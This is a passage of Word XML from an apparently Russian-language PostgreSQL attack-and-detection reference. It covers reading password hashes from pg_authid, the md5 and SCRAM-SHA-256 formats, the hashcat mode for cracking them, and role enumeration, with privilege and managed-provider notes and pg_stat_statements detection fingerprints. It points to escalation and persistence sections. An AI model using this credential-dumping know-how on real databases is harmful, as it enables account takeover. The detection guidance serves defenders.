        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'md5' || encode(md5(password || rolname), 'hex')</w:t>
      </w:r>
      <w:r>
        <w:t>. Salt-ом служит само имя роли — это означает, что одинаковые пароли разных пользователей дают разные хеши, но переименование пользователя инвалидирует хеш (нужно ALTER USER ... PASSWORD).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF8F7E1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SCRAM-SHA-256$&lt;i&gt;:&lt;salt&gt;$&lt;storedKey&gt;:&lt;serverKey&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — RFC 5802. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;i&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — число итераций PBKDF2; salt — random per role; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>storedKey</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>serverKey</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — производные ключи. Подбор требует знания всего формата; hashcat </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-m 28600</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> парсит его нативно.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="334A6AED" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   NULL — пароль не установлен; login возможен только через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_hba.conf trust</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>peer</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ident</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или через клиентский сертификат.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F4C70F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>password_encryption</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> GUC (PG 10+) определяет, какой алгоритм используется при следующем </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ALTER USER ... PASSWORD</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. С PG 14 дефолт — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>scram-sha-256</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>существующие хеши не пересчитываются</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> при изменении GUC — нужен явный </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ALTER USER ... PASSWORD '...'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для каждой роли.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718576CB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Требования к среде.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282B3C9D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PG-версия:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 14–17. Структура </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_authid</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и формат SCRAM-SHA-256 стабильны с PG 10 (где SCRAM появился) и 13 (где SCRAM стал дефолтом). С PG 14 — alternative path через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_read_all_data</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (см. ниже).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC1180C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Расширения:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> не требуются.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C44301" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Привилегии (Payload A):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PUBLIC. См. таблицу в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.8.0</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B4B2B24" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Привилегии (Payload B):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SUPERUSER </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>или</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_read_all_data</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (с PG 14+). На managed эти роли структурно недоступны — см. блок «Версии».</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC3039B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Конфиги GUC:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>password_encryption</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> влияет только на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>новые</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> хеши, существующие можно прочитать всегда (в их формате).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D6E3123" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Как выглядит легитимное использование.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07601822" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_authid</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_stat_statements</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> от </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>любой</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> не-superuser роли — однозначный сигнал атаки (запрос провалится с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>permission denied</w:t>
      </w:r>
      <w:r>
        <w:t>, но сам факт запроса попадёт в лог). Для application-кода нет use case даже близко.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C8A931E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_authid</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> от superuser-сессии — два сценария: (а) операции </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ALTER USER ... PASSWORD</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> через сам PG (не читает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_authid</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> напрямую, а делает UPDATE); (б) backup-инструменты (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_dumpall --globals-only</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — читает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_authid</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для дампа ролей). Сигнал атаки: запрос к </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_authid</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> от superuser-а без сопровождающих DDL-команд и не в окне backup.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B3A934E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_roles</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> от application-роли — обычно норма (ORM/мигратор спрашивают «существует ли роль X»). Атака — массовый SELECT всех ролей с конкатенацией флагов (Payload A) — нормализованный запрос в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_stat_statements</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> имеет характерный отпечаток.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5131F406" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   В </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_stat_statements</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> нормализованный Payload B выглядит как </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT $1, rolname || $2 || COALESCE(rolpassword, $3), rolvaliduntil FROM pg_authid WHERE rolcanlogin = $4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — единственный матч на эту нормализованную форму = атака.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="046B581C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   Маркер в логах: ошибка </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>permission denied for table pg_authid</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> от application-роли — попытка чтения каталога без прав. Это полезный сигнал — он говорит, что атакующий уже знает про </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_authid</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и пробует, но ещё не эскалировался. Сразу после такой ошибки имеет смысл искать в логах попытки 3.13 от той же сессии.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="251FDA0E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Версии.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51FD012F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   Работает на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PostgreSQL 14–17</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. На PG 13 и ниже — отсутствует </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_read_all_data</w:t>
      </w:r>
      <w:r>
        <w:t>, Payload B требует строго SUPERUSER.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72234775" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Managed:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Payload B структурно недоступен на всех major-провайдерах.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> На AWS RDS роль </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>rds_superuser</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>не</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> имеет SUPERUSER-флага в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_authid</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (это специальная роль с подмножеством superuser-прав), SELECT на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_authid</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> блокируется. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_read_all_data</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> на RDS не выдаётся </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>rds_superuser</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. На Google Cloud SQL — аналогично, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cloudsqlsuperuser</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ограничена. На Supabase — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>service_role</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> имеет доступ к </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>auth.users</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (это внутренняя таблица Supabase, не </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_authid</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), но к </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_authid</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> доступа нет. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Payload A (`pg_roles`) работает везде</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — атакующий видит все роли с пометками флагов, включая internal-роли провайдера (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>rds_pgaudit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cloudsqliamuser</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>supabase_admin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>supabase_auth_admin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) — это полезный fingerprint самого провайдера. Детально по провайдерам — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.9</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E79361C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Self-hosted:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Payload B работает в полном объёме при наличии superuser-эскалации (3.13).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1DAB83" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Связанные паттерны.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C49842C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.13.x</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — цепочка получения SUPERUSER, без которой Payload B не применим. После 3.13 → 3.8.3 как post-exploitation для долгосрочного persistence.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B60860C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.17 (RLS bypass)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>rolbypassrls = true</w:t>
